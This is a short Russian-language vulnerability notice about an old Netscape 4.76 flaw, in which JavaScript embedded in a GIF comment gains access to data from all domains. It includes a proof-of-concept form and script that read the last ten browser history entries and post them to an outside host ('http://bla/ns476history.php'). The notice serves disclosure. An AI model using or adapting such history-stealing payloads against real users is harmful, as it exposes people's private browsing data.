Новая дырка
обнаружена в браузере Netscape версии 4.76.
Суть: если вставить
JavaScript в комментарий к gif файлу, то он будет
выполнен с большими привилегиями, нежели
обычно.
Обычно Netscape не
позволяет скриптам читать внутренние
данные браузера, в целом это кончено
правильно, так как в противном случае можно
получить частные данные, которые
разглашать не следует. Вот как раз если
вставить в комментарий к картинке скрипт, то
Netscape свободно даст прочитать данные всех
доменов.
Пример: скрипт читает 10
последних строк из History, запихивает их в
форму и постит ее.
<form action=http://bla/ns476history.php
target=_parent name=s method=get>
<input name=u>
</form>
<script>
f=parent.frames["foo"].document; l="";
for(i=0;i<10;i++) l+=f.links[i]+"|";
document.s.u.value=l;
document.s.submit();
</script>
Точно так же можно
получить доступ к конфигурации браузера.
